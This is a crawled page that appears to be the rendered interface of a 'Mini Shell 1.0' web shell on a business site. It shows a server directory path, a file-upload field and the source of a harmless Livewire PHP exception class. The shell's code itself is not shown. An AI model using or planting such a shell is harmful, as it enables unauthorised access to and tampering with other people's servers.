HOME


Mini Shell 1.0
Negocios La Pieza.DO | Registrate o Inicia Sesión

¡Página no encontrada!

La página que busca no se encuentra en nuestro servidor.

Volver al inicio
DIR: /var/www/devs.lapieza.net/vendor/livewire/livewire/src/Exceptions/
Upload File :
Current File : /var/www/devs.lapieza.net/vendor/livewire/livewire/src/Exceptions/PropertyNotFoundException.php
<?php

namespace Livewire\Exceptions;

class PropertyNotFoundException extends \Exception
{
    use BypassViewHandler;

    public function __construct($property, $component)
    {
        parent::__construct(
            "Property [\${$property}] not found on component: [{$component}]"
        );
    }
}